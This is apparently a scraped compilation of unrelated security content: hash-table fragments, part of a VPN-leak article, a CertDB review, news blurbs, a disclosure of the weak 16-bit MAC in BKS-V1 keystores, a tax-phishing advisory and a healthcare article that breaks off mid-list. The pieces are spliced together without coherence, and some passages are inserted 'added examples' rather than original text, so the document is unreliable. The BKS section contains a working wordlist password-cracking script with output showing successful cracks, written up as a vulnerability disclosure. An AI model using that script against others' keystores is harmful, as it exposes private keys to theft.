11 | aa24deb830a2b1aa694e580c5efb24f979d6c5d861b56354a6acb1ad0cf9809b | DF320ED7EE6CCF9F979AEFE451877FFC | 26 bytes (26 bytes) |
12 | acfb014304b6f2cff00c668a9a2a3a9cbb6f24db6d074a8914dd69b43afa4525 | 84D552B5D22E40BDA23E6587B1BC532D | 6852 bytes (6.69 KiB) |
13 | c80d19f6f3372f4cc6e75ae1af54e8727b54b51aaf2794fedd3a1aa463140480 | 087DD79515D37F7ADA78FF5793A42B7B | 11184 bytes (10.92 KiB) |
14 | e9bce46584acbf59a779d1565687964991d7033d63c06bddabcfc4375c5f1853 | BBEB18C0C3E038747C78FCAB3E0444E3 | 71940 bytes (70.25 KiB) |
Is your VPN secure? How to check for leaks
A trustworthy virtual private network (VPN) is a good way to keep your internet usage secure and private whether at home or on public Wi-Fi. But just how private is your activity over a VPN? In other words, how do you know if the VPN is doing its job or if you’re unwittingly leaking information to prying eyes?
To find out, you first need to know what your computer looks like to the internet without a VPN running. Start by searching for what is my IP on Google. At the top of the search results, Google will report back your current public Internet Protocol (IP) address. That’s a good place to start, but there is more to your internet connection and its potential for leaks.
CertDB is a free SSL certificate search engine and analysis platform

How many times have you looked at an SSL certificate and cared only about the Common Name (CN), the DNS names and the issue and expiry dates? A certificate can say a great deal about you or your firm. Certificates tell stories and reveal motives, and you can gather good intelligence from them: which companies are hosting new domains and sub-domains, whether a firm just revoked its last certificate, or why it switched vendors or CAs. We have all read that SSL certificates are strong in themselves but weak in their issuance process, i.e. the chain of trust that relies on the Certificate Authorities (which are, after all, commercial firms), but few of us have worked with them in real time. Search engines for certificates exist, but none of them is as comprehensive, fast and free as CertDB.
There have been quite a few attacks and hacks where Certificate Authorities were targeted[1] by hacking groups[2] or even involved[3] directly. Even though the vast initiatives by browsers and firms to regularly monitor SSL certificates[4], improve browser behaviours for awareness[5] and revoke the bad ones has been highly appreciated, the pentesters often don't find much during the comprehensive assessment. Recently, there has been an uproar on the business interests of CA(s) with the issuance, so much so that some are being tagged as bad and untrusted CA[6] for not doing job well. Companies are moving aggressively to HTTPS especially with the recent introduction of LetsEncrypt Wildcard Certificates. But we haven't seen the use of all this information on a common platform to further analyse the certificates and assess their digital SSL footprint and gather valuable intelligence.
This is where CertDB steps in. A great project maintained by smart people and FREE forever[7] for the public. I spent last few weeks accessing their services, and the platform and my short verdict says - It is great! It does have some quirks, but highly recommended!
crt.sh and CertDB serve different objectives. crt.sh gets its data from the Certificate Transparency (CT) logging system, to which "legit" CAs submit certificates in "real time"; CertDB is based on scanning the IPv4 address space and domains and finding and analysing whatever certificates are served, good or bad.
CertDB can therefore also find self-signed certificates, which crt.sh cannot. Hence CertDB gives a realistic view of HTTPS as deployed (which IP is using which certificate, self-signed, invalid CA, etc.), while crt.sh shows the "good", law-abiding view, so to speak.
What is CertDB?
CertDB is an Internet search engine for SSL certificates. In simple terms, it parses each certificate and makes the different fields indexable so the user can run search queries on them. It indexes the following common information:
| Fields | Details |
|---|---|
| Subject | Country, State, Category, Serial Number, Locality, Organization, Common Name |
| Issuer | Country, State, Locality, Organization, Common Name |
| Others | Public Key, IP address related to the domain, Validity Dates |
| Fingerprint | SHA1, SHA256 and MD5 |
| Extensions | Usage, Subject Key ID, Authority Key ID, ALT Names, Certificate Policies |
Once these fields have been extracted, you can query them and generate intelligence around them. Each field is available as a term in a logical query, and terms can be combined to build complex queries. CertDB also provides the raw certificate, the public key and JSON-formatted certificate information for download. Recently they have integrated Alexa ranking for the domains and IP addresses, and all of this information is available as filtered lists: top domains, top organizations, top countries, top issuers and so on.
One such exciting list is "expiring certificates", which lists the domains and organizations whose certificates are about to expire. This kind of information is very convenient when auditing or assessing a firm's digital footprint.
Real-time updates
While the documentation says that CertDB continuously scans every reachable web server on the Internet, my lab tests are not conclusive. I have asked the team to clarify and shall publish the response as part of the interview once I have a confirmed reply. Still, it is appreciable that once their scanner detects a certificate, the information is available to the public for analysis in near real time.
Use Cases
With all the information extracted from the digital certificates, we still have to filter the results to get what we need, either via the GUI or via the API. The GUI is open to all and supports such queries through its search box; to use the API one has to register an account.
You can register at https://certdb.com/signup, and an API key will be allotted to you, allowing 1000 queries a day with a maximum of 1000 results per query.
| Field | Value |
|---|---|
| URL | https://certdb.net/api |
| Method | GET, POST |
| api_key | <get your key post registration> |
| q | Any query (just like in the search interface) |
| response_type | 0: JSON list of dictionaries with all details of the found certificates; 1: JSON list of found certificates in base64; 2: JSON list of distinct organizations from the found certificates; 3: JSON list of distinct domains from the found certificates |
It takes 30 seconds to register and receive the API key. Here are a few examples of querying for the right information:
- Search for certificates issued by "Godaddy" to an Italian domain or company: `issuer:"Godaddy.com" country:"Italy"`
- Certificates issued to a subnet or IP range (example: the Amazon global IP range 13.32.0.0/15[8]): `cidr:"13.32.0.0/15"` (to replace `,` with a newline and list only the first 10 results, pipe the output through `tr , '\n' | head -10`)
- Expiring in the next ten days: `expiring:"10 days"`
- Expiring certificates in the next seven days for the Netflix organization: `expiring:"7 days" organization:"Netflix"`
- New certificates in the last five days for Safeway Insurance Company (via API): `new:"5 days" organization:"Safeway Insurance Company"`
There can be many such cases where you would like to know which certificates were issued to a firm in the past, or whether the firm recently got a new domain or sub-domain and is looking at a new line of business. I could think of the following interesting cases when doing an assessment:
- Dork all the subdomains with `site:example.com`, then negate in a loop according to the first result: `site:example.com -www`, then `site:example.com -www -test`, and so on. Or use a threat intel tool to gather the sub-domains and validate that they all have SSL certificates. Manually check, and report any domains that are not on HTTPS (refer: Google will be hard on you if you are not on HTTPS!).
- If you are technically assessing a company, do check their domain names and organization with `q=organization:"Example Inc."`; you will be surprised how often firms are not aware of domains in their name, or of certificates issued to them but not renewed on time.
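As an added example (not code from CertDB or the post) of the organization lookup just described: it composes the query string from the same field:"value" terms the post uses, sends the API key in a POST body rather than in the URL, and diffs the returned domain list against the firm's own inventory. It assumes the API accepts form-encoded POST parameters and that response_type 3 returns a plain JSON list of domain strings; the sample response and inventory are constructed.

```python
"""Check which domains CertDB attributes to an organization are missing from
that organization's own asset inventory.

Added example, not code from CertDB or the post. Assumes the API accepts
form-encoded POST parameters (api_key, q, response_type) and that
response_type=3 returns a plain JSON list of domain strings; the sample
response and inventory below are constructed for illustration."""
import json
import urllib.parse
import urllib.request

API_URL = "https://certdb.net/api"   # from the API table in the post

# Quoted field:"value" terms, in the order the post's own examples use them.
_QUERY_FIELDS = ("issuer", "country", "cidr", "expiring", "new", "organization")


def build_query(**fields):
    """Compose a CertDB search string, e.g.
    build_query(expiring="7 days", organization="Netflix")
    -> 'expiring:"7 days" organization:"Netflix"'."""
    unknown = set(fields) - set(_QUERY_FIELDS)
    if unknown:
        raise ValueError(f"unsupported query field(s): {sorted(unknown)}")
    return " ".join(f'{name}:"{fields[name]}"'
                    for name in _QUERY_FIELDS if name in fields)


def build_request(api_key, query, response_type=3):
    """Build the call as a POST so the key travels in the body, not in a URL
    that intermediate proxies may log or cache (the GET quirk noted below)."""
    body = urllib.parse.urlencode({"api_key": api_key, "q": query,
                                   "response_type": response_type}).encode()
    return urllib.request.Request(API_URL, data=body, method="POST")


def fetch_domains(api_key, query):
    """Live call (needs network and a registered key): distinct domains."""
    with urllib.request.urlopen(build_request(api_key, query), timeout=30) as r:
        return json.load(r)


def _normalize(domain):
    """Lower-case, strip whitespace and a trailing dot, drop a '*.' wildcard."""
    name = domain.strip().lower().rstrip(".")
    return name[2:] if name.startswith("*.") else name


def unknown_domains(certdb_domains, inventory):
    """Domains CertDB lists for the organization that the inventory lacks."""
    known = {_normalize(d) for d in inventory}
    return sorted({_normalize(d) for d in certdb_domains} - known)


# Constructed stand-in for a response_type=3 answer to
# build_query(organization="Example Inc."), and a constructed asset list.
SAMPLE_RESPONSE = json.dumps(["www.example.com", "*.example.com",
                              "EXAMPLE.COM.", "mail.example.net",
                              "old-campaign.example.org"])
INVENTORY = ["example.com", "www.example.com"]


def sample_unknown():
    """Run the diff over the constructed data (used by the self-check)."""
    return unknown_domains(json.loads(SAMPLE_RESPONSE), INVENTORY)


if __name__ == "__main__":
    print(build_query(organization="Example Inc."))
    for d in sample_unknown():
        print("certificate issued, but not in inventory:", d)
```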
Quirks
While the service is great, there are a few issues as well, which the team is working on:
- The errors are not customized. If an API query is wrong, it dumps a lot of debug data, which should be removed.
- The API key cannot be regenerated or revoked by the user. You have to contact CertDB support to revoke it.
- The API key can be used in a `GET` request. This is not recommended, as the request (and the key in it) can be cached at many hops (example: a proxy).
- The documentation is not comprehensive; more detailed information is needed on using the API calls.
- The site doesn't provide an example of API interaction. In my opinion, CertDB should write a page with a few examples in Python, cURL, Ruby, Perl and other common languages, including `json` parsing of the results.
Conclusion
It's been a few weeks since I started using this service, and my frank opinion is that it has great potential and use. I am using this service while assessing AWS instances and Fortune 500 firms. I have also found some expiring certificates for clients and informed them in due course. I would highly recommend you have a look and register an account. You can also set up a cron job to check the dates / digital SSL footprint of an organization.
Next Steps: I shall soon be publishing an interview with their team asking for more details on the roadmap, competition, and improvements.
Cover Image Credit: Photo by Rubén Bagüés
Distrust of the Symantec PKI: Immediate action needed by site operators
In an exclusive interview with Cyber Sins, CERTDB confirms this "project" will always be free to use.
Amazon IP Range: https://ip-ranges.amazonaws.com/ip-ranges.json
More Crypto, More Problems – Application Security Weekly #09
This week, Keith and Paul discuss Uber's open source tool for adversarial simulation, AMD processors, Hijacked MailChimp accounts used to distribute banking malware, and more on this episode of Application Security Weekly!
Full Show Notes: https://wiki.securityweekly.com/ASW_Episode09
Visit https://www.securityweekly.com/asw for all the latest episodes!
Three Hacking Groups You Definitely Need to Know About
Hacker groups began to flourish in the early 1980s with the emergence of computers. Hackers are like predators that can access your private data at any time by exploiting the vulnerabilities of your computer. Hackers usually cover their tracks by leaving false clues or by leaving absolutely no evidence behind. In the light of
The post Three Hacking Groups You Definitely Need to Know About appeared first on Hacker News Bulletin | Find the Latest Hackers News.
Mysql create user
Creating a MySQL user is a very common task and a very important one. Many developers, after creating a user, grant it all permissions over a MySQL schema, and this can be a big security flaw. When you are creating a user you must think of all the permissions that user will need and grant them the
The post Mysql create user appeared first on Hacker News Bulletin | Find the Latest Hackers News.
Why the Cyber Criminals at Synack need $25 Million to Track Down Main Safety Faults
The enormous number of hacks in 2014 has propelled information security to the front of the news and into the minds of many companies. Cyber attacks on big enterprises like Target, Sony and Home Depot recently caused President Obama to call for a partnership between the two sectors (private and public) in order to share the information
The post Why the Cyber Criminals at Synack need $25 Million to Track Down Main Safety Faults appeared first on Hacker News Bulletin | Find the Latest Hackers News.
Want to have a VPN Server on Your Computer (Windows) Without setting up Any Software?
Windows has a built-in facility to work as a VPN server, even though this option is not widely advertised. It works on both Windows 8 and Windows 7. To enable this, the server makes use of the Point-to-Point Tunneling Protocol (PPTP). This could be valuable for linking to your home system on
The post Want to have a VPN Server on Your Computer (Windows) Without setting up Any Software? appeared first on Hacker News Bulletin | Find the Latest Hackers News.
The US health insurance company Premera Blue Cross was attacked by cyber criminals and 11 million records were accessed
Premera Blue Cross, a United States-based health insurance corporation, has confirmed that its systems were breached when cyber criminals hacked the company and gained access to 11 million of its customers' records. It is the second cyber attack in a row
The post The US health insurance company Premera Blue Cross was attacked by cyber criminals and 11 million records were accessed appeared first on Hacker News Bulletin | Find the Latest Hackers News.
Political analysts caution that airplane communication systems are susceptible to cyber attacks
Commercial and even military planes have an Achilles heel that could leave them vulnerable to cyber criminals on the ground, who specialists say could possibly seize cockpits and generate disorder in the skies. At present, radical groups are thought to lack the sophistication to bring down a plane remotely, but it
The post Political analysts caution that airplane communication systems are susceptible to cyber attacks appeared first on Hacker News Bulletin | Find the Latest Hackers News.
Researcher makes $225,000, legally, by cyber attacking browsers
A single researcher, who is in fact a hacker, made $225,000 this week, all by legal means, by attacking browsers. For the past two days, security researchers have descended on Vancouver for a Google-sponsored competition called Pwn2Own,
The post Researcher makes $225,000, legally, by cyber attacking browsers appeared first on Hacker News Bulletin | Find the Latest Hackers News.
Vanished in 60 seconds! – Chinese cyber criminals shut down Adobe Flash, Internet Explorer
Members of two Chinese cyber crime teams have taken the top prizes at a major annual hacking competition held in Vancouver, Canada. Attackers at Pwn2Own, which began in 2007, succeeded in breaching the security of widely used software including Adobe Flash, Mozilla's Firefox browser, Adobe PDF Reader and Microsoft's recently discontinued Internet
The post Vanished in 60 seconds! – Chinese cyber criminals shut down Adobe Flash, Internet Explorer appeared first on Hacker News Bulletin | Find the Latest Hackers News.
Microsoft Remote Desktop Connection Manager
Imagine having access to and control of your computer from anywhere in the world through your iPhone. That would be really futuristic, no? Actually, it is not, because there are applications available that let you tap into your computer from your mobile. These remote control applications do more than simply allow you
The post Microsoft Remote Desktop Connection Manager appeared first on Hacker News Bulletin | Find the Latest Hackers News.
Anonymous wants to further its engagement in the exploration of space – ‘Unite as Species’
The hacktivist group Anonymous, more often associated with cyber campaigns against fraudulent government administrations and terrorist organizations, has now set its sights on space. On the 18th of March they posted a video on the group's main YouTube channel, calling on everyone through
The post Anonymous wants to further its engagement in the exploration of space – ‘Unite as Species’ appeared first on Hacker News Bulletin | Find the Latest Hackers News.
CIPL Welcomes Nathalie Laneret as New Director of Privacy Policy
The Centre for Information Policy Leadership (“CIPL”) at Hunton & Williams LLP is pleased to announce that Nathalie Laneret will be joining CIPL as Director of Privacy Policy in May. She brings more than 20 years of experience in data protection policy both in-house and in private practice. She is admitted to the New York and Paris bars and has experience in both France and in the U.S. on data protection, IT and security matters, contracts, competition law, compliance issues and litigation.
Nathalie joins CIPL from Capgemini Group, a leader in consulting, digital technology and outsourcing, where she was Public Affairs and Group Data Protection Officer, a member of the Group Cybersecurity and Information Protection Steering Committee, and responsible for managing the DPO network and defining Capgemini Group’s implementation strategy for the EU General Data Protection Regulation (“GDPR”). She sits on the IAPP European Advisory Board and is a member of the task force of the Cloud Infrastructure Service Providers in Europe Code of Conduct. In a statement, CIPL President Bojana Bellamy said, “I am delighted that with the addition of Nathalie, CIPL is increasing its presence in Europe and its ability to engage fully in both the ongoing data protection law reform in the EU and developing a strategy for the future.”
For more information about CIPL, visit their website.
The Curious Case of the Bouncy Castle BKS Passwords
While investigating BKS files, the path I went down led me to an interesting discovery: BKS-V1 files will accept any number of passwords to reveal information about potentially sensitive contents!
In preparation for my BSidesSF talk, I've been looking at a lot of key files. One file type that caught my interest is the Bouncy Castle BKS (version 1) file format. Like password-protected PKCS12 and JKS keystore files, BKS keystore files protect their contents from those who do not know the password. That is, a BKS file may contain only public information, such as a certificate. Or it may contain one or more private keys. But you won't know until after you use the password to unlock it.
Update March 21, 2018:
We have updated this blog post based on feedback from Thomas Pornin, and confirmation from the Bouncy Castle author. Like JKS files, BKS files do not protect the metadata of their contents by default. The keystore-level password and its associated key are only used for integrity checking. By default, private keys are encrypted with the same password as the keystore. These private keys are not affected by the keystore-level weakness outlined in this blog post. That is, even if an unexpected password is accepted by the keystore itself, that same password will not be accepted to decrypt a private key contained within the keystore. Original wording in this blog post that is now understood to be inaccurate has been marked in strikeout notation for transparency.
Cracking BKS Files
As I investigated the first BKS file in my list, I quickly ~~realized~~ assumed that I could not determine what was contained in it unless I had the password. Naively searching the web for things like "bks cracker" and stopping there, I concluded that I'd need to roll my own BKS bruteforce cracker.
Update March 21, 2018:
Tools used to inspect BKS files will refuse to list the contents of the keystore if a valid password is not provided. However, this is actually not because the metadata of the keystore contents are protected. Because the metadata of the keystore contents are not encrypted, this information can be viewed without needing to use a valid password.
Using the pyjks library, I wrote a trivial script:
```python
#!/usr/bin/env python3
import os
import sys
import jks


def trypw(bksfile, pw):
    """Try one password against the keystore; exit 0 on the first hit."""
    try:
        keystore = jks.bks.BksKeyStore.load(bksfile, pw)
        if keystore:
            print('Password for %s found: "%s"' % (bksfile, pw))
            sys.exit(0)
    except jks.util.KeystoreSignatureException:
        # keystore MAC did not verify: wrong password
        pass
    except UnicodeDecodeError:
        pass


# argv[1] is the wordlist, argv[2] is the BKS file
with open(sys.argv[1]) as h:
    pwlist = h.readlines()
for pw in pwlist:
    trypw(sys.argv[2], pw.rstrip())
sys.exit(1)
```
Let's try this on the test BKS file that I have:
```console
$ python crackbks.py strings.txt test.bks
Password for test.bks found: "Redefinir senha"
```
Cool. "Redefinir senha" seems like an unexpected password to me, but it's not terrible in strength. It has 15 characters, and uses mixed-case and a non-alphanumeric character (a space). Depending on the password-cracking technique used, it could hold up pretty well to bruteforce attacks.
The above proof-of-concept script is quite slow, since it will serially attempt passwords, one at a time. Taking advantage of multi-core systems in Python isn't as easy as it should be, due to the Python GIL. As a simple test, I tried using the ProcessPoolExecutor to see if I could increase my password-attempt throughput. ProcessPoolExecutor side-steps the GIL by spreading the work across multiple Python processes. Each Python process has its own GIL, but because multiple Python processes are being used, this approach should help better utilize my multiprocessor system.
Let's try this version of the brute-force cracking tool:
```console
$ python crackbks.py strings.txt test.bks
Password for test.bks found: "Redefinir senha"
Password for test.bks found: "Activity started without extras"
Password for test.bks found: "query.is.any.user.logged.in"
```
Wait, what is going on here? How can a single BKS file accept multiple passwords? As it turns out, there are two things going on:
First, when I optimized my BKS bruteforce script with the use of ProcessPoolExecutor, I didn't factor in how the script would behave when it is distributed across multiple processes. In the single-threaded instance above, the script exits as soon as it finds the password. However, when it's distributed across multiple processes using ProcessPoolExecutor, things are different. I didn't have any code to explicitly terminate the parent Python process or any of the forked Python processes. The impact of this is that my multi-process BKS cracking script will continue to make attempts after it finds the password.
The other thing that is happening is related to the BKS file format, which I discuss below.
Hashes and Collisions
When a resource is password-protected with a single password, it is extremely unlikely that another password can also be used to unlock the resource. Consider the simple case where a collision-resistant hash function is used to verify the password: Is this password unique?
Applying a cryptographic hash function to the password results in the following hashes:
MD5 (128-bit): 18fcfa801383d10dd0a1fea051674469
SHA-1 (160-bit): c9e2ef80e5f2afb8aef0d058182cc7f59e93e025
SHA-256 (256-bit): 08a6c455079687616e997c7bfd626ae754ba1a71b229db1b3a515cfa45e9d4ea
The MD5 hash algorithm, which has a digest size of 128 bits, was shown in 1996 to be unsafe if a collision-resistant hash is required. By 2005, researchers produced a pair of PostScript documents and a pair of X.509 certificates where each pair shared the same MD5 hash. While it takes a bit of CPU processing power to find such collisions, it's feasible to do so with modern computing hardware.
The SHA-1 hash algorithm, which has a digest size of 160 bits, is more resistant to collisions than MD5. However, by February 2017 the first known SHA-1 collision had been produced. This attack required "the equivalent processing power as 6,500 years of single-CPU computations and 110 years of single-GPU computations."
The SHA-256 hash algorithm, which has a digest size of 256 bits, is even more resistant to collisions than SHA-1. To date, no collisions have been found using the SHA-256 hashing algorithm.
BKS-V1 Files and Accidental Collisions
My naive BKS bruteforcing script produced three different passwords for the same BKS file. Let's look at the code for handling BKS files in pyjks:
```python
hmac_fn = hashlib.sha1
hmac_digest_size = hmac_fn().digest_size
hmac_key_size = hmac_digest_size*8 if version != 1 else hmac_digest_size
hmac_key = rfc7292.derive_key(hmac_fn, rfc7292.PURPOSE_MAC_MATERIAL, store_password, salt, iteration_count, hmac_key_size//8)
```
Here we can see that the HMAC function is SHA-1, which isn't bad. However, it turns out that it's the HMAC key (and its size) that is important, since that's what determines whether the correct password has been provided to unlock the BKS keystore file. If the file is a BKS version 1 file, the hmac_key_size value will be the same as hmac_digest_size.
In the case of hashlib.sha1, the digest_size is 20 bytes (160 bits). But where it gets interesting is the derivation of hmac_key. The size of hmac_key is determined by hmac_key_size//8 (integer division, dropping any remainder). In this case, it's 20//8, which is 2 bytes (16 bits). Why is there integer division by 8 at all? It's not clear, but perhaps the developer confused where bits are used and bytes are used in the code.
Let's add a debugging print() statement to the bks.py component of pyjks and test our three different passwords for the same BKS keystore:
```console
$ python -c "import jks; keystore = jks.bks.BksKeyStore.load('test.bks', 'Redefinir senha')"
hmac_key: c019
$ python -c "import jks; keystore = jks.bks.BksKeyStore.load('test.bks', 'Activity started without extras')"
hmac_key: c019
$ python -c "import jks; keystore = jks.bks.BksKeyStore.load('test.bks', 'query.is.any.user.logged.in')"
hmac_key: c019
```
Here we can see that the hmac_key value is c019 (hex) with each of the three different passwords that are provided. In each of the three cases, the BKS-V1 keystore is decrypted, despite the likelihood that not one of the three accepted passwords was the one chosen by the software developer.
Why was I accidentally able to find BKS-V1 password collisions thanks to my shoddy Python programming skills? The maximum entropy you get from any BKS-V1 password is only 16 bits. This is nowhere near enough bits to represent a password. When it comes to password strength, entropy can be used as a measure. If only bruteforce techniques are used, each case-sensitive Latin alphabet character adds 5.7 bits of entropy. So a randomly-chosen three-character, case-sensitive Latin alphabet password will have 17.1 bits of entropy, which already exceeds what can be represented in 16 bits. In other words, while a developer can choose a reasonably strong password to protect the integrity of a BKS-V1 file's contents, the file format itself only supports complexity equivalent to just less than that of a randomly-selected case-sensitive three-letter password.
Cracking BKS-V1 Files
What amount of integrity protection does a 16-bit hmac_key provide? Virtually nothing. 16 bits can only represent 65,536 different values. What this means is regardless of the password complexity the developer has chosen, a bruteforce password cracker needs to try at most 65,536 times. A high-end GPU these days can crunch through over 10 billion SHA-1 operations per second.
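As an added example (not code from pyjks or Bouncy Castle), the key derivation quoted above reimplemented from RFC 7292 and run under both size rules from the pyjks snippet: with the V1 rule the MAC key is 2 bytes and a few hundred constructed candidate passwords already collide, while with the rule for later versions it is 20 bytes and none do. The salt, iteration count and candidate passwords are constructed, not the values from test.bks, so the derived keys differ from the c019 shown above.

```python
"""Effective MAC key length of BKS-V1 versus later BKS versions.

Added example, not code from pyjks or Bouncy Castle: a from-scratch
implementation of the PKCS#12 key derivation function (RFC 7292, App. B.2,
with SHA-1) that BKS uses for its store MAC key, followed by the two key-size
rules quoted from pyjks. Salt, iteration count and candidate passwords are
constructed here, not taken from the author's test.bks."""
import hashlib
import math

PURPOSE_MAC_MATERIAL = 3          # RFC 7292 B.3 ID byte for MAC key material
U = hashlib.sha1().digest_size    # 20-byte digest
V = 64                            # SHA-1 input block size in bytes
SALT = bytes(range(1, 21))        # constructed 20-byte salt
ITERATIONS = 64                   # constructed; real stores use a larger count


def _fill(data, length):
    """Repeat data up to the next multiple of `length` bytes (empty stays empty)."""
    if not data:
        return b""
    target = length * math.ceil(len(data) / length)
    return (data * math.ceil(target / len(data)))[:target]


def pkcs12_kdf(purpose, password, salt, iterations, key_len):
    """RFC 7292 B.2 derivation with SHA-1; returns exactly key_len bytes."""
    d = bytes([purpose]) * V
    # Passwords are BMPStrings: UTF-16BE code units plus a 16-bit NUL.
    i_buf = _fill(salt, V) + _fill((password + "\0").encode("utf-16be"), V)
    out = b""
    for _block in range(math.ceil(key_len / U)):
        a = hashlib.sha1(d + i_buf).digest()
        for _round in range(iterations - 1):
            a = hashlib.sha1(a).digest()
        out += a
        # I_j = (I_j + B + 1) mod 2^(8V), where B is A repeated to V bytes.
        b_plus_1 = int.from_bytes(_fill(a, V), "big") + 1
        i_buf = b"".join(
            ((int.from_bytes(i_buf[j:j + V], "big") + b_plus_1) % (1 << (8 * V)))
            .to_bytes(V, "big")
            for j in range(0, len(i_buf), V))
    return out[:key_len]


def bks_mac_key_len(version):
    """The pyjks rule: digest_size*8 bits, or just digest_size (20 'bits') for
    V1, then integer-divided by 8 -> 20 bytes for V2+, 2 bytes for V1."""
    key_bits = U * 8 if version != 1 else U
    return key_bits // 8


def bks_mac_key(password, version, salt=SALT, iterations=ITERATIONS):
    """Store MAC key as derived for the given BKS version."""
    return pkcs12_kdf(PURPOSE_MAC_MATERIAL, password, salt, iterations,
                      bks_mac_key_len(version))


def mac_key_space(version):
    """Number of distinct MAC keys the format can produce."""
    return 1 << (8 * bks_mac_key_len(version))


def first_collision(version, limit):
    """First pair of distinct constructed passwords sharing a MAC key, or None
    if no two of the first `limit` candidates collide."""
    seen = {}
    for n in range(limit):
        pw = f"candidate-{n:05d}"   # constructed wordlist entry
        key = bks_mac_key(pw, version)
        if key in seen:
            return seen[key], pw
        seen[key] = pw
    return None


if __name__ == "__main__":
    for version in (1, 2):
        key = bks_mac_key("Redefinir senha", version)
        print(f"BKS-V{version}: MAC key {key.hex()} ({len(key)} bytes), "
              f"{mac_key_space(version)} possible keys, "
              f"collision among 5000 candidates: {first_collision(version, 5000)}")
```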
As it turns out John the Ripper does have BKS file support, despite what my earlier web searches turned up. While there isn't currently GPU support for cracking BKS files, a CPU is plenty fast enough. My limited testing has shown that any BKS-V1 file can be cracked in about 10 seconds or less using just a single CPU core on a modern system.
Conclusion and Recommendations
Without a doubt, BKS-V1 keystore files are insecure, due to the insufficient HMAC key size. Although BKS files support password protection to protect the integrity of their contents, the protection supplied by version 1 of the file format is nearly zero. For these reasons, here are recommendations for developers who use Bouncy Castle:
- Be sure to use Bouncy Castle version 1.47 or newer. This version, which was introduced on March 30, 2012, increases the default MAC of a BKS key store from 2 bytes to 20 bytes. This information has been in the Bouncy Castle release notes for about six years, but it may have been overlooked because no CVE identifier was assigned to this weakness. Approximately 84% of the BKS files seen in Android applications are using the vulnerable version 1. We assigned CVE-2018-5382 to this issue to help ensure that it gets the attention it deserves.
- On modern Bouncy Castle versions, do not use the "BKS-V1" format, which was added for legacy compatibility with Bouncy Castle version 1.46 and earlier.
If you rely on the password protection provided by BKS-V1 to protect private key material, these private keys should be considered compromised. Such keys should be regenerated and stored in a keystore that provides adequate protection against brute-force attacks, along with a sufficiently complex and long password. For BKS files that contain only public information, such as certificates, the weak password protection provided by version 1 of the format is not important.
For more details, please see CERT Vulnerability Note VU#306792.
Tax Phishing Scams Are Back: Here Are 3 to Watch Out For
This Year’s Crop of Tax Phishing Scams Target Individuals, Employers, and Tax Preparers
Tax season is stressful enough without having to worry about becoming the victim of a cyber crime. Here are three different tax phishing scams targeting employers, individuals, and even tax preparers that are currently making the rounds.
Employers: W-2 Phishing Emails
The W-2 phishing scams that have plagued employers for a couple of years are back with a vengeance. The IRS noticed a significant uptick in these tax phishing scams beginning in January and recently issued an official warning. Also known as spear phishing or business email compromise (BEC) scams, these campaigns differ from traditional phishing scams in that they are highly targeted. They are sent to specific employees within organizations who have access to employee tax data, usually human resources personnel, and often appear to come from a company executive. Occasionally, the IRS reports, the email will request a wire transfer along with employee W-2 data.
Individuals: Phony “Tax Notification” Emails
While the hackers behind this particular scam are not seeking tax ID data, they are harnessing the stress of tax season and victims’ fear of the IRS to get them to click on phishing links. The targets are Microsoft 365 users, and Dark Reading reports that “tens of millions” may have received the emails. The messages purport to be from the IRS, warn recipients that there is some sort of problem with their taxes and that dire consequences will result if they do not take immediate action, and include attachments with names such as “taxletter.doc.” Downloading and opening the attachment installs password-stealing malware on the victim’s machine.
Tax Preparers and Individuals: New Tax ID Theft Phishing Scheme
These highly sophisticated tax phishing scams are executed in two phases. In the first phase, hackers send traditional or spear phishing emails to tax preparers, which install malware on their computers and allow the hackers to steal client tax and bank account data.
In the second phase, the hackers use the data to file fraudulent tax returns – then have IRS refunds deposited in the victims’ bank accounts. In some cases, the return is filed using one victim’s tax data and the money deposited in another victim’s bank account. The bank account owners are then contacted by someone claiming to be an IRS representative, demanding that they take specific (and irreversible) steps to “return” the money.
Fighting Back Against Tax Phishing Scams
There are several ways to prevent falling victim to these and other tax phishing scams. Organizations should ensure that all employees are trained to identify phishing emails, including spear phishing, have a specific and clear procedure to report suspicious emails, and take all other appropriate proactive cyber security measures. Individuals should also be aware of the warning signs of a phishing email, including text written in broken English and return addresses that appear to be off, such as a government agency with a .com address.
The IRS requests that suspected tax-related phishing emails be forwarded to phishing@irs.gov. If you receive an erroneous refund deposit to your bank account, follow the IRS’s instructions for returning it:
- Contact the Automated Clearing House (ACH) department of the bank/financial institution where the direct deposit was received and have them return the refund to the IRS.
- Call the IRS toll-free at 800-829-1040 (individual) or 800-829-4933 (business) to explain why the direct deposit is being returned.
- Interest may accrue on the erroneous refund.
The cyber security experts at Lazarus Alliance have deep knowledge of the cyber security field, are continually monitoring the latest information security threats, and are committed to protecting organizations of all sizes from security breaches. Our full-service risk assessment services and Continuum GRC RegTech software will help protect your organization from data breaches, ransomware attacks, and other cyber threats.
Lazarus Alliance is proactive cyber security®. Call 1-888-896-7580 to discuss your organization’s cyber security needs and find out how we can help your organization adhere to cyber security regulations, maintain compliance, and secure your systems.
Employees Are Biggest Threat to Healthcare Data Security
Two new reports illustrate the threat of employee carelessness and maliciousness to healthcare data security
Healthcare data security is under attack from the inside. While insider threats – due to employee error, carelessness, or malicious intent – are a problem in every industry, they are a particular pox on healthcare data security. Two recent reports illustrate the gravity of the situation.
Verizon’s 2018 Protected Health Information Data Breach Report, which examined 1,368 healthcare data security incidents in 27 countries (heavily weighted towards the U.S.), found that:
- 58% of protected health information (PHI) security incidents involved internal actors, making healthcare the only industry where internal actors represent the biggest threat to their organizations.
- About half of these incidents were due to error or carelessness; the other half were committed with malicious intent.
- Financial gain was the biggest driver behind intentional misuse of PHI, accounting for 48% of incidents. Unauthorized snooping into the PHI of acquaintances, family members, or celebrities out of curiosity or for “fun” was second (31%).
- Over 80% of the time, insiders who intentionally misused PHI didn’t “hack” anything; they simply used their existing credentials or physical access to hardware (such as access to a laptop containing PHI).
- 21% of PHI security incidents involved lost or stolen laptops containing unencrypted data.
- In addition to PHI breaches, ransomware continues to plague healthcare data security; 70% of incidents involving malicious code were ransomware attacks.
Meanwhile, a separate survey on healthcare data security conducted by Accenture found that nearly one in five healthcare employees would be willing to sell confidential patient data to a third party, and they would do so for as little as $500 to $1,000. Even worse, nearly one-quarter reported knowing “someone in their organization who has sold their credentials or access to an unauthorized outsider.”
Combating Insider Threats to Healthcare Data Security
Healthcare data security is especially tricky because many care providers need immediate, unrestricted access to patient information to do their jobs; an access control that gets in the way at the wrong moment can delay treatment and harm a patient. There are, however, proactive steps healthcare organizations can take to combat insider threats:
- Establish written acceptable use policies clearly outlining who is allowed to access patient health data and when, and the consequences of accessing PHI without a legitimate reason.
